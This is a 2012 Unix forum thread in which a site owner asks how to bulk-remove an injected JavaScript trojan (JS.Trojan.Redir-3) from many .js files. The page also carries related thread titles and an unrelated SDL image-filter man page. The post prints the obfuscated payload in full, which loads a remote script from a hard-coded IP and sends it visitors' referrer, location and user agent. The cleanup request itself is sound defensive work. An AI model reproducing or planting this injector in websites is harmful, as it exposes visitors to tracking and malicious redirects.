Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: how to remove hacking code from multiple files
Top Forums Shell Programming and Scripting how to remove hacking code from multiple files Post 302708779 by MaRiOsGR on Tuesday 2nd of October 2012 08:32:48 AM
Old 10-02-2012
how to remove hacking code from multiple files
Hello,

I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code

Code:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :
Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

any help would be appriciated.
 

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

read list of filenames from text file and remove these files in multiple directories

I have a large list of filenames from an Excel sheet, which I then translate into a simple text file. I'd like to use this list, which contains various file extensions , to archive these files and then remove them recursively through multiple directories and subdirectories. So far, it looks like... (5 Replies)
Discussion started by: fxvisions
5 Replies

2. Shell Programming and Scripting

How to remove certain lines in multiple txt files?

Hi , I have this type of files:- BGH.28OCT2008.00000001.433155.001 BGH.28OCT2008.00000002.1552361.001 BGH.28OCT2008.00000003.1438355.001 BGH.28OCT2008.00000004.1562602.001 Inside them contains the below: 5Discounts 6P150 - Max Total Usage RM150|-221.00 P150 EPP - Talktime RM150... (5 Replies)
Discussion started by: olloong
5 Replies

3. UNIX for Dummies Questions & Answers

Using AWK: Extract data from multiple files and output to multiple new files

Hi, I'd like to process multiple files. For example: file1.txt file2.txt file3.txt Each file contains several lines of data. I want to extract a piece of data and output it to a new file. file1.txt ----> newfile1.txt file2.txt ----> newfile2.txt file3.txt ----> newfile3.txt Here is... (3 Replies)
Discussion started by: Liverpaul09
3 Replies

4. Shell Programming and Scripting

To remove multiple files in FTP

We have a files in FTP server..... after getting the files from FTP by mget *.* i hav to remove all files (multiple files) at once... is there any command to delete multiple files at once (2 Replies)
Discussion started by: nani1984
2 Replies

5. UNIX for Dummies Questions & Answers

How to remove characters from multiple .txt files

Friends, I want to remove charecters from multiple .txt files. Foe example : In this .txt files there are many "ctrl m" present in last of each line in one .txt file. I want to remove "ctrl m" from each line from all .txt files. Need your help regarding this. (4 Replies)
Discussion started by: meetsubhas
4 Replies

6. Shell Programming and Scripting

Remove java code from multiple files

Hello, We have a client who has had an FTP injection attack on their account. Over 600 files have this code added to the files: <script>var t="";var... (10 Replies)
Discussion started by: dhasbro
10 Replies

7. Shell Programming and Scripting

Code to remove files when corresponding file doesnt exist isnt working.

I am trying to add some code to the begging of a script so that it will remove all the .transcript files, when their is no coressponding .wav file. But it doesnt work. This is the code I have added: for transcriptfile in `$voicemaildir/*.transcript`; do wavfile=`echo $transcriptfile | cut -d'.'... (2 Replies)
Discussion started by: ghurty
2 Replies

8. Shell Programming and Scripting

How to remove hidden backslash in multiple files?

Hi I have around 300 files in a folder. When I type ls -l I see the following Mouse.chr10_+_:101862321-101863928.maf Mouse.chr10_+_:101862322-101863928.maf Mouse.chr10_+_:101862323-101863928.maf But when I run my scripts, they couldn't recognise the filename because of hidden backslash like... (5 Replies)
Discussion started by: quincyjones
5 Replies

9. Shell Programming and Scripting

[Solved] How to remove multiple files?

Hi Gurus, I have below files in one directory. the file name has date and time portion which is exactly the file be created. I need keep only lasted created file which is abc_20140101_1550 and remove rest of the file. abc_20140101_1300 abc_20140101_1200 abc_20140101_1400 abc_20140101_1500... (2 Replies)
Discussion started by: ken6503
2 Replies

10. UNIX for Beginners Questions & Answers

How to implement a simple command/code for multiple files?

I have been extracting a row, based on multiple key word from a xls/csv file, by using the following command. I have to implement the same for multiple xls/csv files, therefore please help me to do the same. awk ' { tbp=0 if ($0 ~ keyword1 && k1 == 0) { tbp=1; k1++ } if ($0 ~ keyword2... (2 Replies)
Discussion started by: dineshkumarsrk
2 Replies

LEARN ABOUT DEBIAN

sdl::gfx::imagefilter

pods::SDL::GFX::ImageFilter(3pm)			User Contributed Perl Documentation			  pods::SDL::GFX::ImageFilter(3pm)

NAME

       SDL::GFX::ImageFilter - image filtering functions

CATEGORY

       TODO, GFX

METHODS

   MMX_detect
       int gfx_image_MMX_detect()      CODE:	       SDL_imageFilterMMXdetect();

   MMX_off
       void gfx_image_MMX_off()      CODE:	     SDL_imageFilterMMXoff();

   MMX_on
       void gfx_image_MMX_on()	    CODE:	    SDL_imageFilterMMXon();

   add
       int gfx_image_add(Src1, Src2, Dest, length)	unsigned char *Src1	 unsigned char *Src2	  unsigned char *Dest	   int length
	    CODE:	    RETVAL = SDL_imageFilterAdd(Src1, Src2, Dest, length);	OUTPUT: 	  RETVAL

   mean
       int gfx_image_mean(Src1, Src2, Dest, length)	 unsigned char *Src1	  unsigned char *Src2	   unsigned char *Dest	    int length
	    CODE:	    RETVAL = SDL_imageFilterMean(Src1, Src2, Dest, length);	 OUTPUT:	   RETVAL

   sub
       int gfx_image_sub(Src1, Src2, Dest, length)	unsigned char *Src1	 unsigned char *Src2	  unsigned char *Dest	   int length
	    CODE:	    RETVAL = SDL_imageFilterSub(Src1, Src2, Dest, length);	OUTPUT: 	  RETVAL

   abs_diff
       int gfx_image_abs_diff(Src1, Src2, Dest, length)      unsigned char *Src1      unsigned char *Src2      unsigned char *Dest	int length
	    CODE:	    RETVAL = SDL_imageFilterAbsDiff(Src1, Src2, Dest, length);	    OUTPUT:	      RETVAL

   mult
       int gfx_image_mult(Src1, Src2, Dest, length)	 unsigned char *Src1	  unsigned char *Src2	   unsigned char *Dest	    int length
	    CODE:	    RETVAL = SDL_imageFilterMult(Src1, Src2, Dest, length);	 OUTPUT:	   RETVAL

   mult_nor
       int gfx_image_mult_nor(Src1, Src2, Dest, length)      unsigned char *Src1      unsigned char *Src2      unsigned char *Dest	int length
	    CODE:	    RETVAL = SDL_imageFilterMultNor(Src1, Src2, Dest, length);	    OUTPUT:	      RETVAL

   mult_div_by_2
       int gfx_image_mult_div_by_2(Src1, Src2, Dest, length)	  unsigned char *Src1	   unsigned char *Src2	    unsigned char *Dest      int
       length	   CODE:	   RETVAL = SDL_imageFilterMultDivby2(Src1, Src2, Dest, length);      OUTPUT:		RETVAL

   mult_div_by_4
       int gfx_image_mult_div_by_4(Src1, Src2, Dest, length)	  unsigned char *Src1	   unsigned char *Src2	    unsigned char *Dest      int
       length	   CODE:	   RETVAL = SDL_imageFilterMultDivby4(Src1, Src2, Dest, length);      OUTPUT:		RETVAL

   bit_and
       int gfx_image_bit_and(Src1, Src2, Dest, length)	    unsigned char *Src1      unsigned char *Src2      unsigned char *Dest      int length
	    CODE:	    RETVAL = SDL_imageFilterBitAnd(Src1, Src2, Dest, length);	   OUTPUT:	     RETVAL

   bit_or
       int gfx_image_bit_or(Src1, Src2, Dest, length)	   unsigned char *Src1	    unsigned char *Src2      unsigned char *Dest      int length
	    CODE:	    RETVAL = SDL_imageFilterBitOr(Src1, Src2, Dest, length);	  OUTPUT:	    RETVAL

   div
       int gfx_image_div(Src1, Src2, Dest, length)	unsigned char *Src1	 unsigned char *Src2	  unsigned char *Dest	   int length
	    CODE:	    RETVAL = SDL_imageFilterDiv(Src1, Src2, Dest, length);	OUTPUT: 	  RETVAL

   bit_negation
       int gfx_image_bit_negation(Src1, Dest, length)	   unsigned char *Src1	    unsigned char *Dest      int length      CODE:
		 RETVAL = SDL_imageFilterBitNegation(Src1, Dest, length);      OUTPUT:		 RETVAL

   add_byte
       int gfx_image_add_byte(Src1, Dest, length, C)	  unsigned char *Src1	   unsigned char *Dest	    int length	    unsigned char C
	    CODE:	    RETVAL = SDL_imageFilterAddByte(Src1, Dest, length, C);	 OUTPUT:	   RETVAL

   add_uint
       int gfx_image_add_uint(Src1, Dest, length, C)	  unsigned char *Src1	   unsigned char *Dest	    int length	    unsigned int C
	    CODE:	    RETVAL = SDL_imageFilterAddUint(Src1, Dest, length, C);	 OUTPUT:	   RETVAL

   add_byte_to_half
       int gfx_image_add_byte_to_half(Src1, Dest, length, C)	  unsigned char *Src1	   unsigned char *Dest	    int length	    unsigned char
       C      CODE:	      RETVAL = SDL_imageFilterAddByteToHalf(Src1, Dest, length, C);	 OUTPUT:	   RETVAL

   sub_byte
       int gfx_image_sub_byte(Src1, Dest, length, C)	  unsigned char *Src1	   unsigned char *Dest	    int length	    unsigned char C
	    CODE:	    RETVAL = SDL_imageFilterSubByte(Src1, Dest, length, C);	 OUTPUT:	   RETVAL

   sub_uint
       int gfx_image_sub_uint(Src1, Dest, length, C)	  unsigned char *Src1	   unsigned char *Dest	    int length	    unsigned int C
	    CODE:	    RETVAL = SDL_imageFilterSubUint(Src1, Dest, length, C);	 OUTPUT:	   RETVAL

   shift_right
       int gfx_image_shift_right(Src1, Dest, length, N)      unsigned char *Src1      unsigned char *Dest      int length      unsigned char N
	    CODE:	    RETVAL = SDL_imageFilterShiftRight(Src1, Dest, length, N);	    OUTPUT:	      RETVAL

   shift_right_uint
       int gfx_image_shift_right_uint(Src1, Dest, length, N)	  unsigned char *Src1	   unsigned char *Dest	    int length	    unsigned char
       N      CODE:	      RETVAL = SDL_imageFilterShiftRightUint(Src1, Dest, length, N);	  OUTPUT:	    RETVAL

   mult_by_byte
       int gfx_image_mult_by_byte(Src1, Dest, length, C)      unsigned char *Src1      unsigned char *Dest	int length	unsigned char C
	    CODE:	    RETVAL = SDL_imageFilterMultByByte(Src1, Dest, length, C);	    OUTPUT:	      RETVAL

   shift_right_and_mult_by_byte
       int gfx_image_shift_right_and_mult_by_byte(Src1, Dest, length, N, C)	 unsigned char *Src1	  unsigned char *Dest	   int length
	    unsigned char N	 unsigned char C      CODE:	      RETVAL = SDL_imageFilterShiftRightAndMultByByte(Src1, Dest, length, N, C);
	    OUTPUT:	      RETVAL

   shift_left_byte
       int gfx_image_shift_left_byte(Src1, Dest, length, N)	 unsigned char *Src1	  unsigned char *Dest	   int length	   unsigned char N
	    CODE:	    RETVAL = SDL_imageFilterShiftLeftByte(Src1, Dest, length, N);      OUTPUT:		 RETVAL

   shift_left_uint
       int gfx_image_shift_left_uint(Src1, Dest, length, N)	 unsigned char *Src1	  unsigned char *Dest	   int length	   unsigned char N
	    CODE:	    RETVAL = SDL_imageFilterShiftLeftUint(Src1, Dest, length, N);      OUTPUT:		 RETVAL

   shift_left
       int gfx_image_shift_left(Src1, Dest, length, N)	    unsigned char *Src1      unsigned char *Dest      int length      unsigned char N
	    CODE:	    RETVAL = SDL_imageFilterShiftLeft(Src1, Dest, length, N);	   OUTPUT:	     RETVAL

   binarize_using_threshold
       int gfx_image_binarize_using_threshold(Src1, Dest, length, T)	  unsigned char *Src1	   unsigned char *Dest	    int length
	    unsigned char T	 CODE:		 RETVAL = SDL_imageFilterBinarizeUsingThreshold(Src1, Dest, length, T);      OUTPUT:
		 RETVAL

   clip_to_range
       int gfx_image_clip_to_range(Src1, Dest, length, Tmin, Tmax)	unsigned char *Src1	 unsigned char *Dest	  int length	  unsigned
       char Tmin      unsigned char Tmax      CODE:	      RETVAL = SDL_imageFilterClipToRange(Src1, Dest, length, Tmin, Tmax);	OUTPUT:
		 RETVAL

   normalize_linear
       int gfx_image_normalize_linear(Src1, Dest, length, Cmin, Cmax, Nmin, Nmax)      unsigned char *Src1	unsigned char *Dest	 int
       length	   int Cmin	 int Cmax      int Nmin      int Nmax	   CODE:	   RETVAL = SDL_imageFilterNormalizeLinear(Src1, Dest,
       length, Cmin, Cmax, Nmin, Nmax);      OUTPUT:	       RETVAL

   convolve_kernel_3x3_divide
       int gfx_image_convolve_kernel_3x3_divide(Src, Dest, rows, columns, Kernel, Divisor)	unsigned char *Src	unsigned char *Dest
	    int rows	  int columns	   Sint16 *Kernel      unsigned char Divisor	  CODE: 	  RETVAL =
       SDL_imageFilterConvolveKernel3x3Divide(Src, Dest, rows, columns, Kernel, Divisor);      OUTPUT:		 RETVAL

   convolve_kernel_5x5_divide
       int gfx_image_convolve_kernel_5x5_divide(Src, Dest, rows, columns, Kernel, Divisor)	unsigned char *Src	unsigned char *Dest
	    int rows	  int columns	   Sint16 *Kernel      unsigned char Divisor	  CODE: 	  RETVAL =
       SDL_imageFilterConvolveKernel5x5Divide(Src, Dest, rows, columns, Kernel, Divisor);      OUTPUT:		 RETVAL

   convolve_kernel_7x7_divide
       int gfx_image_convolve_kernel_7x7_divide(Src, Dest, rows, columns, Kernel, Divisor)	unsigned char *Src	unsigned char *Dest
	    int rows	  int columns	   Sint16 *Kernel      unsigned char Divisor	  CODE: 	  RETVAL =
       SDL_imageFilterConvolveKernel7x7Divide(Src, Dest, rows, columns, Kernel, Divisor);      OUTPUT:		 RETVAL

   convolve_kernel_9x9_divide
       int gfx_image_convolve_kernel_9x9_divide(Src, Dest, rows, columns, Kernel, Divisor)	unsigned char *Src	unsigned char *Dest
	    int rows	  int columns	   Sint16 *Kernel      unsigned char Divisor	  CODE: 	  RETVAL =
       SDL_imageFilterConvolveKernel9x9Divide(Src, Dest, rows, columns, Kernel, Divisor);      OUTPUT:		 RETVAL

   convolve_kernel_3x3_shift_right
       int gfx_image_convolve_kernel_3x3_shift_right(Src, Dest, rows, columns, Kernel, NRightShift)	 unsigned char *Src	 unsigned char
       *Dest	  int rows	int columns	 Sint16 *Kernel      unsigned char NRightShift	    CODE:	    RETVAL =
       SDL_imageFilterConvolveKernel3x3ShiftRight(Src, Dest, rows, columns, Kernel, NRightShift);      OUTPUT:		 RETVAL

   convolve_kernel_5x5_shift_right
       int gfx_image_convolve_kernel_5x5_shift_right(Src, Dest, rows, columns, Kernel, NRightShift)	 unsigned char *Src	 unsigned char
       *Dest	  int rows	int columns	 Sint16 *Kernel      unsigned char NRightShift	    CODE:	    RETVAL =
       SDL_imageFilterConvolveKernel5x5ShiftRight(Src, Dest, rows, columns, Kernel, NRightShift);      OUTPUT:		 RETVAL

   convolve_kernel_7x7_shift_right
       int gfx_image_convolve_kernel_7x7_shift_right(Src, Dest, rows, columns, Kernel, NRightShift)	 unsigned char *Src	 unsigned char
       *Dest	  int rows	int columns	 Sint16 *Kernel      unsigned char NRightShift	    CODE:	    RETVAL =
       SDL_imageFilterConvolveKernel7x7ShiftRight(Src, Dest, rows, columns, Kernel, NRightShift);      OUTPUT:		 RETVAL

   convolve_kernel_9x9_shift_right
       int gfx_image_convolve_kernel_9x9_shift_right(Src, Dest, rows, columns, Kernel, NRightShift)	 unsigned char *Src	 unsigned char
       *Dest	  int rows	int columns	 Sint16 *Kernel      unsigned char NRightShift	    CODE:	    RETVAL =
       SDL_imageFilterConvolveKernel9x9ShiftRight(Src, Dest, rows, columns, Kernel, NRightShift);      OUTPUT:		 RETVAL

   sobel_x
       int gfx_image_sobel_x(Src, Dest, rows, columns)	    unsigned char *Src	    unsigned char *Dest      int rows	   int columns	    CODE:
		 RETVAL = SDL_imageFilterSobelX(Src, Dest, rows, columns);	OUTPUT: 	  RETVAL

   sobel_x_shift_right
       int gfx_image_sobel_x_shift_right(Src, Dest, rows, columns, NRightShift)      unsigned char *Src      unsigned char *Dest      int rows
	    int columns      unsigned char NRightShift	    CODE:	    RETVAL = SDL_imageFilterSobelXShiftRight(Src, Dest, rows, columns,
       NRightShift);	  OUTPUT:	    RETVAL

   align_stack
       void gfx_image_align_stack()	 CODE:		 SDL_imageFilterAlignStack();

   restore_stack
       void gfx_image_restore_stack()	   CODE:	   SDL_imageFilterRestoreStack();

AUTHORS

       See "AUTHORS" in SDL.

perl v5.14.2							    2012-05-28					  pods::SDL::GFX::ImageFilter(3pm)
All times are GMT -4. The time now is 07:33 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy